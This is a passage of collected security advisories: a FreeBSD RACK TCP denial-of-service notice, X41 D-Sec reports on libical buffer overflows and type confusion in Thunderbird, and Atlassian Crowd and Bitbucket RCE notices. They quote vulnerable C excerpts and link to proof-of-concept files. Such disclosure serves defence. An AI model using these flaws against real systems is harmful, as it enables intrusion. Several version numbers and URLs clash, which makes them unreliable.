cause the lists to grow unbounded. This can cause an expensive list traversal on every packet being processed, leading to resource exhaustion and a denial of service. III. Impact An attacker with the ability to send specially crafted TCP traffic to a victim system can degrade network performance and/or consume excessive CPU by exploiting the inefficiency of traversing the potentially very large RACK linked lists with relatively small bandwidth cost. IV. Workaround By default RACK is not compiled or loaded into the TCP stack. To determine if you are using RACK, check the net.inet.tcp.functions_available sysctl. If it includes a line with "rack", the RACK stack is loaded. To disable RACK, unload the kernel module with: # kldunload tcp_rack Note: it may be required to use the force flag (-f) with the kldunload. V. Solution Upgrade your vulnerable system to a supported FreeBSD stable or release / security branch (releng) dated after the correction date. Perform one of the following: 1) To update your vulnerable system via a binary patch: Systems running a RELEASE version of FreeBSD on the i386 or amd64 platforms can be updated via the freebsd-update(8) utility: # freebsd-update fetch # freebsd-update install Since the tcp_rack kernel module is not built by default, recompile, reinstall, and reload the kernel module. 2) To update your vulnerable system via a source code patch: The following patches have been verified to apply to the applicable FreeBSD release branches. a) Download the relevant patch from the location below, and verify the detached PGP signature using your PGP utility. # fetch https://security.FreeBSD.org/patches/SA-19:08/rack.patch # fetch https://security.FreeBSD.org/patches/SA-19:08/rack.patch.asc # gpg --verify rack.patch.asc b) Apply the patch. Execute the following commands as root: # cd /usr/src # patch < /path/to/patch c) Recompile, reinstall, and reload the tcp_rack kernel module. VI. Correction details The following list contains the correction revision numbers for each affected branch. Branch/path Revision - - stable/12/r349197 releng/12.0/ r349199 - - To see which files were modified by a particular revision, run the following command, replacing NN with the revision number, on a machine with Subversion installed: # svn diff -cNN --summarize svn://svn.freebsd.org/base Or visit the following URL, replacing NN with the revision number: https://svnweb.freebsd.org/base?view=revision&revision=NN> VII. References https://github.com/Netflix/security-bulletins/blob/master/advisories/third-party/2019-001.md> https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5599> The latest revision of this advisory is available at https://security.FreeBSD.org/advisories/FreeBSD-SA-19:08.rack.asc> -BEGIN PGP SIGNATURE- iQKTBAEBCgB9FiEE/A6HiuWv54gCjWNV05eS9J6n5cIFAl0KZy1fFIAALgAo aXNzdWVyLWZwckBub3RhdG
X41 D-Sec GmbH Security Advisory X41-2019-004: Type confusion in Thunderbird
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 X41 D-Sec GmbH Security Advisory: X41-2019-004 Type confusion in Thunderbird = Severity Rating: Medium Confirmed Affected Versions: All versions affected Confirmed Patched Versions: Thunderbird ESR 60.7.XXX Vendor: Thunderbird Vendor URL: https://www.thunderbird.net/ Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1555646 Vector: Incoming mail with calendar attachment Credit: X41 D-SEC GmbH, Luis Merino Status: Public CVE: CVE-2019-11706 CWE: 843 CVSS Score: 6.5 CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-004-thunderbird Summary and Impact == A type confusion has been identified in the Thunderbird email client. The issue is present in the libical implementation, which was forked from upstream libical version 0.47. The issue can be triggered remotely, when an attacker sends an specially crafted calendar attachment and does not require user interaction. It might be used by a remote attacker to crash the process or leak information from the client system via calendar replies. X41 did not perform a full test or audit on the software. Product Description === Thunderbird is a free and open source email, newsfeed, chat, and calendaring client, that's easy to set up and customize. Analysis A type confusion in icalproperty.c icaltimezone_get_vtimezone_properties() can be triggered while parsing a malformed calendar attachment. Missing sanity checks allows a TZID property to be parsed as ICALFLOATVALUE but it is later used as a string. The bug manifests with strdup(tzid); being called with tzid containing a bad pointer obtained by casting to char* from a float value, which typically means segfaulting by dereferencing a non-mapped memory page. An attacker might be able to deliver an input file containing specially crafted float values as TZID properties which could point to arbitrary memory positions. Certain conditions could allow to exfiltrate information via a calendar reply or other undetermined impact. Proof of Concept A reproducer eml file can be found in https://github.com/x41sec/advisories/tree/master/X41-2019-004 Workarounds === A fix is available from upstream. Alternatively, libical can be replaced by icaljs, a JavaScript implementation of ical parsing, by setting calendar.icaljs = true in Thunderbird configuration. Timeline 2019-05-30 Issues reported to the vendor 2019-06-07 Vendor reply 2019-06-12 CVE IDs assigned 2019-06-13 Patched Version released 2019-06-13 Advisory released About X41 D-SEC GmbH X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services. Fields of expertise in the area of application security are security centered code reviews, binary reverse engineering and vulnerability discovery. Custom research and a IT security consulting and support services are core competencies of X41. -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAl0CtO0ACgkQo5Klpg50 CxCkuA/+L513gnHCf0hOFGuFsGaEX6dPSmJi1g2Wom28cXJw7dEd6/qU4k5H64cI yRDQR7vVt7+xUTlPIh8sguaPjB7xOlw+3pHpLo5+pfIuUuK/gK4Wm8ZF1Qv4okBs e046d2Nd+UAX/WbEXLt4UHOowgVEJWHfq54WkKHNTseWpeww/sBNdv1qlliiUCWa qnFMzA7rbgtOJl/LxS9xDOp5PufD3inR/Apvh49P8IhDj6L7+02fxGt0WdwA/8vF TiI2V4bHEYrLmsUptSHSj10HKfMlEqKgWWQCunTGvUZvWWYHS6cS6a9EbHuWWyNY 8BNj045D0Gw0xL1697erebeIxOZ33+QdEp1NopVzpJkeZBZtx/XYPY3PnQ+HMRjr 4LwsjdDBeaMVgiUIZ2EZ08779MBYPNB+6p0byaWgyTbyHk0GRVxqRNwkU/8xS0f4 M9NUt75T7FjqU8VX/KyZsmXs+/8tauh0T3J9CYoQ73r/WoRxB0xeJCEJueRegctu gSnIf+KApkmE+2WRc8CrPSZx42XhTjcoEgbcYSxGebEitd+bGz2j2gjwqxDGC8nr QK30hr/lOaC0y6nblfCygx+G6hZH1dc2+fi6ZboWZRqRTtB2zIM+SulMj+QjtHCm UMPFQeB8stxBfIAxLu8DojBq4YWP8N2wQ5MyAW3/TzTd+JO1Wbk= =Hy9J -END PGP SIGNATURE-
X41 D-Sec GmbH Security Advisory X41-2019-003: Stack-based buffer overflow in Thunderbird
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 X41 D-Sec GmbH Security Advisory: X41-2019-003 Stack-based buffer overflow in Thunderbird == Severity Rating: High Confirmed Affected Versions: All versions affected Confirmed Patched Versions: Thunderbird ESR 60.7.XXX Vendor: Thunderbird Vendor URL: https://www.thunderbird.net/ Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553808 Vector: Incoming mail with calendar attachment Credit: X41 D-SEC GmbH, Luis Merino Status: Public CVE: CVE-2019-11705 CWE: 121 CVSS Score: 7.8 CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-003-thunderbird Summary and Impact == A stack-based buffer overflow has been identified in the Thunderbird email client. The issue is present in the libical implementation, which was forked from upstream libical version 0.47. The issue can be triggered remotely, when an attacker sends an specially crafted calendar attachment and does not require user interaction. It might be used by a remote attacker to crash or gain remote code execution in the client system. X41 did not perform a full test or audit on the software. Product Description === Thunderbird is a free and open source email, newsfeed, chat, and calendaring client, that's easy to set up and customize. Analysis A stack-based buffer overflow in icalrecur.c icalrecur_add_bydayrules() can be triggered while parsing a calendar attachment containing a malformed or specially crafted string. ~~~ static int icalrecuraddbydayrules(struct icalrecurparser *parser, const char *vals) { short *array = parser->rt.byday; // ... while (n != 0) { // ... if (wd != ICALNOWEEKDAY) { array[i++] = (short) (sign * (wd + 8 * weekno)); array[i] = ICALRECURRENCEARRAYMAX; } } ~~~ Missing sanity checks in `icalrecuradd_bydayrules()can lead to out of bounds write in aarraywhenweekno` takes an invalid value. The issue manifests as an out-of-bounds write in a stack allocated buffer overflow. It is expected that an attacker can exploit this vulnerability to achieve remote code execution when proper stack smashing mitigations are missing. Proof of Concept A reproducer eml file can be found in https://github.com/x41sec/advisories/tree/master/X41-2019-003 Workarounds === A fix is available from upstream. Alternatively, libical can be replaced by icaljs, a JavaScript implementation of ical parsing, by setting calendar.icaljs = true in Thunderbird configuration. Timeline 2019-05-23 Issues reported to the vendor 2019-05-23 Vendor reply 2019-06-12 CVE IDs assigned 2019-06-13 Patched Version released 2019-06-13 Advisory released About X41 D-SEC GmbH X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services. Fields of expertise in the area of application security are security centered code reviews, binary reverse engineering and vulnerability discovery. Custom research and a IT security consulting and support services are core competencies of X41. -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAl0CtJsACgkQo5Klpg50 CxALNg//RiEGsoszNtnBzS/tvL5UIniG6oBXHaqu+9XZUJeM+tYzs4Z3JvvHWx1y exGt3nM3PMXgw21lr8NumJGHibMDckIrOIpetphg9GqRfk/iS4NivcHcbhSq7sNz NajGpulM6HtgDflFgpB1GKfekE/DJlbiULq5SBgv/bARRARGGgGNtWp863sQPKG+ rvjSOnTyQw1ypYjozMYrmUasgC4jsLmB0LUIWqHy6lEN5OWehnO9pOpiV8xTA0qc Y9C0IDkf6YGH6xwOxaUXc9HXGBOiQATexNGOtOmWoUsg7cpRdnuoo8YOP9V+kbeX OK301LlXUtt0th5zu6tVGo4WK75sI8gmpxUtcbIyCxTzRC7fqAlbHGaKlQURZ23s /2Tv5pzpBBjIO4T2t8v1O/10pDyfH2zUCXik3il2GY+zpNprR1Va6asB4y3nEPl1 ghLYCjHt58CZJZILMmK/lZap6I3ea9UaW3TsZuC07zv8A9bf+I6xcgA0+4Ms6e0P 1d1T/ygVluKRay5fgiiubTYAqtngFTOXMCioj/JmeDvL+wTYpwduukhZxDuGT6P/ OV0MuvDW1RQpj2hsw+dbcVnE+Y7X/WZDVbq3ByOj5VQz/mTPkcGaJVh37kI9Sp6A YFJYuJrFqmdMFh365aUmAOp26hYdY9++wwWAqAlYAVFjLXst5is= =E1se -END PGP SIGNATURE-
X41 D-Sec GmbH Security Advisory X41-2019-002: Heap-based buffer overflow in Thunderbird
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 X41 D-Sec GmbH Security Advisory: X41-2019-002 Heap-based buffer overflow in Thunderbird = Severity Rating: High Confirmed Affected Versions: All versions affected Confirmed Patched Versions: Thunderbird ESR 60.7.XXX Vendor: Thunderbird Vendor URL: https://www.thunderbird.net/ Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553820 Vector: Incoming mail with calendar attachment Credit: X41 D-SEC GmbH, Luis Merino Status: Public CVE: CVE-2019-11703 CWE: 122 CVSS Score: 7.8 CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-002-thunderbird Summary and Impact == A heap-based buffer overflow has been identified in the Thunderbird email client. The issue is present in the libical implementation, which was forked from upstream libical version 0.47. The issue can be triggered remotely, when an attacker sends an specially crafted calendar attachment and does not require user interaction. It might be used by a remote attacker to crash or gain remote code execution in the client system. This issue was initially reported by Brandon Perry here: https://bugzilla.mozilla.org/show_bug.cgi?id=1281041 and fixed in libical upstream, but was never fixed in Thunderbird. X41 did not perform a full test or audit on the software. Product Description === Thunderbird is a free and open source email, newsfeed, chat, and calendaring client, that's easy to set up and customize. Analysis A heap-based buffer overflow in icalparser.c parser_get_next_char() can be triggered while parsing a calendar attachment containing a malformed or specially crafted string. The issue initially manifests with out of bounds read, but we don't discard it could later lead to out of bounds write. It is expected that an attacker can exploit this vulnerability to achieve remote code execution. Proof of Concept A reproducer ical file can be found in https://github.com/x41sec/advisories/tree/master/X41-2019-002 Workarounds === A fix is available from upstream. Alternatively, libical can be replaced by icaljs, a JavaScript implementation of ical parsing, by setting calendar.icaljs = true in Thunderbird configuration. Timeline 2016-06-20 Issue reported by Brandon Perry to the vendor 2019-05-23 Issues reported to the vendor 2019-05-23 Vendor reply 2019-06-12 CVE IDs assigned 2019-06-13 Patched Version released 2019-06-13 Advisory released About X41 D-SEC GmbH X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services. Fields of expertise in the area of application security are security centered code reviews, binary reverse engineering and vulnerability discovery. Custom research and a IT security consulting and support services are core competencies of X41. -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAl0CtHsACgkQo5Klpg50 CxD5DRAAnruhd0PEjQV3ELUiM/9PHe5hC8rpWLqPNcuDY/dbPvg4w1qOAoXops9e d3hJlMM2zaUeAv5MZGgxT7FIO116IFafALMjMssIC9zw3yM9oKF4s1amL/GzF+P9 vMamD3A5t5j2mHYuWFaDe+bcHak8QfmVgSRqKNvNp/rF27oWE3SgCraYFP1+RlpR s0qbFcjLdo9SBqvpbSt3cbolrIOiS2nXER1cthmd2Ig7ga3oElEfWKZ19d+twBxx oKqtS607p9ASfql29HDwC0VtgQPx1ySRBestYDtjsD2d97bAaAhA2/Kkpx6A/H91 EbiSyKByO3vs+nQzTdkI/xNN9edBly6se3WKaDBIfZOzWCsXwcUtUKpnAw5YMf/n BoaDzv/D70Sk3GfXOD9qb2bMNFCEQdeZh3O1Tmmzi3kXa9kQJfdIDdjfeeDd7h87 r6vtYeHA7mVM2BGteO5FHQhooJVSi+gcGg9esj5656YznRS9zbc7KgkWJiItwMhj hiBL7r8v2M0Gzx4qhhCg+gxl+ikBaYCgZh9WGi4fsekwufwEnnCnQxN52ZE9vBia BJJGpPbGkVaxDCJXOfQDvJiovbG4ekK54tavqLBXaH/KuucMFGaE95gPSKnxn8LD 0QwpeLzad2bSiolSHux5RBR/t5d4znzjce/qxIpRQdWcgu9kzTs= =1OOu -END PGP SIGNATURE-
X41 D-Sec GmbH Security Advisory X41-2019-001: Heap-based buffer overflow in Thunderbird
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 X41 D-Sec GmbH Security Advisory: X41-2019-001 Heap-based buffer overflow in Thunderbird = Severity Rating: High Confirmed Affected Versions: All versions affected Confirmed Patched Versions: Thunderbird ESR 60.7.XXX Vendor: Thunderbird Vendor URL: https://www.thunderbird.net/ Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553814 Vector: Incoming mail with calendar attachment Credit: X41 D-SEC GmbH, Luis Merino Status: Public CVE: CVE-2019-11704 CWE: 122 CVSS Score: 7.8 CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-002-thunderbird Summary and Impact == A heap-based buffer overflow has been identified in the Thunderbird email client. The issue is present in the libical implementation, which was forked from upstream libical version 0.47. The issue can be triggered remotely, when an attacker sends an specially crafted calendar attachment and does not require user interaction. It might be used by a remote attacker to crash or gain remote code execution in the client system. This issue was initially reported by Brandon Perry here: https://bugzilla.mozilla.org/show_bug.cgi?id=1280832 and fixed in libical upstream, but was never fixed in Thunderbird. X41 did not perform a full test or audit on the software. Product Description === Thunderbird is a free and open source email, newsfeed, chat, and calendaring client, that's easy to set up and customize. Analysis A heap-based buffer overflow in icalvalue.c icalmemory_strdup_and_dequote() can be triggered while parsing a calendar attachment containing a malformed or specially crafted string. ~~~ static char *icalmemorystrdupanddequote(const char *str) { char *out = (char *)malloc(sizeof(char) * strlen(str) + 1); char *pout = out; // ... for (p = str; *p!=0; p++){ if( *p == '\') { p++; // ... else { *pout = *p; } } ~~~ Bounds checking in `icalmemorystrdupanddequote()can be bypassed when the inputp` ends with a backslash, which enables an attacker to read out of bounds of the input buffer and writing out of bounds of a heap-allocated output buffer. The issue manifests in several ways, including out of bounds read and write, null-pointer dereference and frequently leads to heap corruption. It is expected that an attacker can exploit this vulnerability to achieve remote code execution. Proof of Concept A reproducer EML file can be found in: https://github.com/x41sec/advisories/tree/master/X41-2019-001 Workarounds === A fix is available from upstream. Alternatively, libical can be replaced by icaljs, a JavaScript implementation of ical parsing, by setting calendar.icaljs = true in Thunderbird configuration. Timeline 2016-06-19 Issue reported by Brandon Perry to the vendor 2019-05-23 Issue reported by X41 D-SEC to the vendor 2019-05-23 Vendor reply 2019-06-12 CVE IDs assigned 2019-06-13 Patched Version released 2019-06-13 Advisory released About X41 D-SEC GmbH X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services. Fields of expertise in the area of application security are security centered code reviews, binary reverse engineering and vulnerability discovery. Custom research and a IT security consulting and support services are core competencies of X41. -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAl0CtFQACgkQo5Klpg50 CxDziQ/+JVKmkCHu3UXeNTrf3nFAcg3pzopaADVMK4yo7P/iQW/HMtvlz3sbi/ND 8nkTzXjPwTXmPZqrcr8X28lsffx2wu4ehIZNp2izTkfQkbIeA0co1bM2KhGJU+p+ GQP8yGsVi00+UvQfd5KxB4ydc7/Q4nTFH325yx7D4OHW/rDuETt5p8h1h7zmFBW+ SV09t4qQQx8HeWj2pQS6wF6pWo80/nqJbS8f540PQ+XTysvYsflxiybAqYK2mW2j QzvjT/YosR39JCMHBKscptwVgJFT6b2DsSq+Lt+1BTn0Ef0XoIY/rMvLFX1ww8HK nsViFPjtyhkX7CftIjZK6y4oK4nKsgyDiOieNKodfkr1jTmipUIIjwtGM99pKcv2 wNDY4ySB7RSbW+W+yrWc75vEX+Ev1enXkeM6xcJiPO0CiWfceZpVzZVcjoFqt9H6 57Uy10OMzZDi3reIMsMs3SxpRyXQqcyjlPkk7PlkzHx2XjAMKqwW6t5QZwMpIHrm M4BQOzxz9UuhnfZI80ZmJhYCh9zOOdjmJXGxOp5cB1GSXjQQ7PH/0aqTbfI0Hp+b uxqXsxBJ0YTO0qhHluuPkInqLEKlewHvNT4P5YE7US3TNCHPuei7P3zTq7fqSPjW sgj9XXjf4cbB7N+txXnq55BpHemGKAd4spgvQvo0L35m2RribBs= =sYWR -END PGP SIGNATURE-
X41 D-Sec GmbH Security Advisory X41-2019-001: Heap-based buffer overflow in Thunderbird
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 X41 D-Sec GmbH Security Advisory: X41-2019-001 Heap-based buffer overflow in Thunderbird = Severity Rating: High Confirmed Affected Versions: All versions affected Confirmed Patched Versions: Thunderbird ESR 60.7.XXX Vendor: Thunderbird Vendor URL: https://www.thunderbird.net/ Vendor Reference: https://bugzilla.mozilla.org/show_bug.cgi?id=1553814 Vector: Incoming mail with calendar attachment Credit: X41 D-SEC GmbH, Luis Merino Status: Public CVE: CVE-2019-11704 CWE: 122 CVSS Score: 7.8 CVSS Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:U/RL:O Advisory-URL: https://www.x41-dsec.de/lab/advisories/x41-2019-002-thunderbird Summary and Impact == A heap-based buffer overflow has been identified in the Thunderbird email client. The issue is present in the libical implementation, which was forked from upstream libical version 0.47. The issue can be triggered remotely, when an attacker sends an specially crafted calendar attachment and does not require user interaction. It might be used by a remote attacker to crash or gain remote code execution in the client system. This issue was initially reported by Brandon Perry here: https://bugzilla.mozilla.org/show_bug.cgi?id=1280832 and fixed in libical upstream, but was never fixed in Thunderbird. X41 did not perform a full test or audit on the software. Product Description === Thunderbird is a free and open source email, newsfeed, chat, and calendaring client, that's easy to set up and customize. Analysis A heap-based buffer overflow in icalvalue.c icalmemory_strdup_and_dequote() can be triggered while parsing a calendar attachment containing a malformed or specially crafted string. ~~~ static char *icalmemorystrdupanddequote(const char *str) { char *out = (char *)malloc(sizeof(char) * strlen(str) + 1); char *pout = out; // ... for (p = str; *p!=0; p++){ if( *p == '\') { p++; // ... else { *pout = *p; } } ~~~ Bounds checking in `icalmemorystrdupanddequote()can be bypassed when the inputp` ends with a backslash, which enables an attacker to read out of bounds of the input buffer and writing out of bounds of a heap-allocated output buffer. The issue manifests in several ways, including out of bounds read and write, null-pointer dereference and frequently leads to heap corruption. It is expected that an attacker can exploit this vulnerability to achieve remote code execution. Proof of Concept A reproducer EML file can be found in: https://github.com/x41sec/advisories/tree/master/X41-2019-001 Workarounds === A fix is available from upstream. Alternatively, libical can be replaced by icaljs, a JavaScript implementation of ical parsing, by setting calendar.icaljs = true in Thunderbird configuration. Timeline 2016-06-19 Issue reported by Brandon Perry to the vendor 2019-05-23 Issue reported by X41 D-SEC to the vendor 2019-05-23 Vendor reply 2019-06-12 CVE IDs assigned 2019-06-13 Patched Version released 2019-06-13 Advisory released About X41 D-SEC GmbH X41 is an expert provider for application security services. Having extensive industry experience and expertise in the area of information security, a strong core security team of world class security experts enables X41 to perform premium security services. Fields of expertise in the area of application security are security centered code reviews, binary reverse engineering and vulnerability discovery. Custom research and a IT security consulting and support services are core competencies of X41. -BEGIN PGP SIGNATURE- iQIzBAEBCAAdFiEEpwxVTgxAIcUvTugIo5Klpg50CxAFAl0CsOUACgkQo5Klpg50 CxA8/A/+KajTIDyZwSInPe0uftrEG/c+DNJLQfpH53sBH4qI9G8F+FPquEibdCEm WIXlbdxxo7iVGkBUxws3+aqOXYtBYRGUQvSMDxcM9bmLWkzIOWCZ7RW4h4KOngWu NiWqFkdpRLxSjHgEFn3eegvcnwEmpOlV4eBw5oY1rTFCg44hbrLXTKEZqOOVFII/ n754abauYhol2SezeuJL2Du1hf7n0e4T6DPdYsrwB4+3XwAdp6n86hy9DdXniqdk XvJ2WFTKPljkt2suHmkM28zx8q52O5kMIK0Szc5MVZRiFIrPNh/oYFkCoBVYTqFQ /ui0YJZOy8O6mA1l7j7A3I+t3DSUu4Cs0fCVCqrBVKm1LNcmnWIyDrGRCpY5WOTI S8lllwEeUv5UoSaoPAWIXhvo1J4ISUX0qoNWNqtRENJCXjZvsmOvZkwWy0bMdu5g 1iWZ3Ro/hx7eAbakWKPrzRdnLI7wz7bBcnm3BSY4gelAhtTMLds/OSplDUpYL1cI KRMsnosf2CBiRGlGqdpXVlXcsmi3dozRY7q87Kxh58x50efGTqYQ+yAmR1pMrQgH O0yWaspEQOnqoPiw9dvT3gTqopk0qNdPWwbr599NAVOP5d0H3AKyeJxzTzVUIsxg Jynb/E4hQxgyYN8tSqH/2SXqmXiOPJrJgLt0O4KmKVjMwvnS/OU= =3l5l -END PGP SIGNATURE-
Crowd Security Advisory - 2019-05-22
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 This email refers to the advisory found at https://confluence.atlassian.com/x/3ADVOQ . CVE ID: * CVE-2019-11580. Product: Crowd and Crowd Data Center. Affected Crowd and Crowd Data Center product versions: 2.1.0 <= version < 3.0.5 3.1.0 <= version < 3.1.6 3.2.0 <= version < 3.2.8 3.3.0 <= version < 3.3.5 3.4.0 <= version < 3.4.4 Fixed Crowd and Crowd Data Center product versions: * Crowd and Crowd Data Center 3.0.5 have been released with a fix for this issue. * for 3.1.x, Crowd and Crowd Data Center 3.1.6 have been released with a fix for this issue. * for 3.2.x, Crowd and Crowd Data Center 3.2.8 have been released with a fix for this issue. * for 3.3.x, Crowd and Crowd Data Center 3.3.5 have been released with a fix for this issue. * for 3.4.x, Crowd and Crowd Data Center 3.4.4 have been released with a fix for this issue. Summary: This advisory discloses a critical severity security vulnerability. Versions of Crowd and Crowd Data Center starting with version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x), from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability. Customers who have upgraded Crowd and Crowd Data Center to version 3.0.5 or 3.1.6 or 3.2.8 or 3.3.5 or 3.4.4 are not affected. Customers who have downloaded and installed Crowd and/or Crowd Data Center >= 2.1.0 but less than 3.0.5 or who have downloaded and installed Crowd and Crowd Data Center >= 3.1.0 but less than 3.1.6 (the fixed version for 3.1.x) or who have downloaded and installed Crowd and Crowd Data Center >= 3.2.0 but less than 3.2.8 (the fixed version for 3.2.x) or who have downloaded and installed Crowd and Crowd Data Center >= 3.3.0 but less than 3.3.5 (the fixed version for 3.3.x) or who have downloaded and installed Crowd and Crowd Data Center >= 3.4.0 but less than 3.4.4 (the fixed version for 3.4.x) please upgrade your Crowd and Crowd Data Center installations immediately to fix this vulnerability. pdkinstall development plugin incorrectly enabled - CVE-2019-11580 Severity: Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low. This is our assessment and you should evaluate its applicability to your own IT environment. Description: Crowd and Crowd Data Center had the pdkinstall development plugin incorrectly enabled in release builds. Attackers who can send unauthenticated or authenticated requests to a Crowd or Crowd Data Center instance can exploit this vulnerability to install arbitrary plugins, which permits remote code execution on systems running a vulnerable version of Crowd or Crowd Data Center. Versions of Crowd and Crowd Data Center starting with version 2.1.0 before 3.0.5 (the fixed version for 3.0.x), from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x), from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x), from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x), from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability. This issue can be tracked at: https://jira.atlassian.com/browse/CWD-5388 . Fix: To address this issue, we've released the following versions containing a fix: * Crowd and Crowd Data Center version 3.0.5 * Crowd and Crowd Data Center version 3.1.6 * Crowd and Crowd Data Center version 3.2.8 * Crowd and Crowd Data Center version 3.3.5 * Crowd and Crowd Data Center version 3.4.4 Remediation: Atlassian recommends customers running a version of Crowd below version 3.3.0 upgrade to version 3.2.8 to avoid https://jira.atlassian.com/browse/CWD-5352, for customers running a version above or equal to 3.3.0 Atlassian recommends to upgrade to the latest version. The vulnerabilities and fix versions are described above. If affected, you should upgrade to the latest version immediately. If you are running Crowd and Crowd Data Center 3.1.x and cannot upgrade to 3.4.4, upgrade to version 3.1.6. If you are running Crowd and Crowd Data Center 3.2.x and cannot upgrade to 3.4.4, upgrade to version 3.2.8. If you are running Crowd and Crowd Data Center 3.3.x and cannot upgrade to 3.4.4, upgrade to version 3.3.5. For a full description of the latest version of Crowd and Crowd Data Center, see the release notes found at https://confluence.atlassian.com/display/CROWD/Crowd+Release+Notes. You can download the latest version of Crowd and Crowd Data Center from the download centre found at https://www.atlassian.com/software/crowd/download. Support: If you have questions or concerns regarding this advisory, please raise a support request at https://
Bitbucket Server security advisory 2019-05-22
-BEGIN PGP SIGNED MESSAGE- Hash: SHA256 This email refers to the advisory found at https://confluence.atlassian.com/x/V87JOQ . CVE ID: * CVE-2019-3397. Product: Bitbucket Server. Affected Bitbucket Server product versions: 5.13.0 <= version < 5.13.5 5.14.0 <= version < 5.14.3 5.15.0 <= version < 5.5.2 6.0.0 <= version < 6.0.3 6.1.0 <= version < 6.1.1 Fixed Bitbucket Server product versions: * for 5.13.x, Bitbucket Server 5.13.5 has been released with a fix for this issue. * for 5.14.x, Bitbucket Server 5.14.3 has been released with a fix for this issue. * for 5.15.x, Bitbucket Server 5.5.2 has been released with a fix for this issue. * for 6.0.x, Bitbucket Server 6.0.3 has been released with a fix for this issue. * for 6.1.x, Bitbucket Server 6.1.1 has been released with a fix for this issue. Summary: This advisory discloses a critical severity security vulnerability. Versions of Bitbucket Server starting with 5.13.0 before 5.13.6 (the fixed version for 5.13.x), from 5.14.0 before 5.14.4 (fixed version for 5.14.x), from 5.15.0 before 5.15.3 (fixed version for 5.13.x), from 6.0.0 before 6.0.3 (fixed version for 6.0.x), and from 6.1.0 before 6.1.2 (the fixed version for 6.1.x) are affected by this vulnerability. Customers who have upgraded Bitbucket Server to version 5.13.6 or 5.14.4 or 5.15.3 or 6.0.3 or 6.1.2 are not affected. Customers who have downloaded and installed Bitbucket Server >= 5.13.0 but less than 5.13.5 (the fixed version for 5.13.x) or who have downloaded and installed Bitbucket Server >= 5.14.0 but less than 5.14.3 (the fixed version for 5.14.x) or who have downloaded and installed Bitbucket Server >= 5.15.0 but less than 5.5.2 (the fixed version for 5.15.x) or who have downloaded and installed Bitbucket Server >= 6.0.0 but less than 6.0.3 (the fixed version for 6.0.x) or who have downloaded and installed Bitbucket Server >= 6.1.0 but less than 6.1.1 (the fixed version for 6.1.x) please upgrade your Bitbucket Server installations immediately to fix this vulnerability. Path traversal in the migration tool RCE (CVE-2019-3397) Severity: Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low. This is our assessment and you should evaluate its applicability to your own IT environment. Description: Bitbucket Data Center had a path traversal vulnerability in the Data Center migration tool. A remote attacker with authenticated user with admin permissions can exploit this path traversal vulnerability to write files to arbitrary locations which can lead to remote code execution on systems that run a vulnerable version of Bitbucket Data Center. Bitbucket Server versions without a Data Center license are not vulnerable to this vulnerability. Versions of Bitbucket Server starting with 5.13.0 before 5.13.6 (the fixed version for 5.13.x), from 5.14.0 before 5.14.4 (fixed version for 5.14.x), from 5.15.0 before 5.15.3 (fixed version for 5.13.x), from 6.0.0 before 6.0.3 (fixed version for 6.0.x), and from 6.1.0 before 6.1.2 (the fixed version for 6.1.x) are affected by this vulnerability. This issue can be tracked at: https://jira.atlassian.com/browse/BSERV-11706 . Fix: To address this issue, we've released the following versions containing a fix: * Bitbucket Server version 5.13.6 * Bitbucket Server version 5.14.4 * Bitbucket Server version 5.15.3 * Bitbucket Server version 6.0.3 * Bitbucket Server version 6.1.2 Remediation: Upgrade Bitbucket Server to version 6.1.2 or higher. The vulnerabilities and fix versions are described above. If affected, you should upgrade to the latest version immediately. If you are running Bitbucket Server 5.13.x and cannot upgrade to 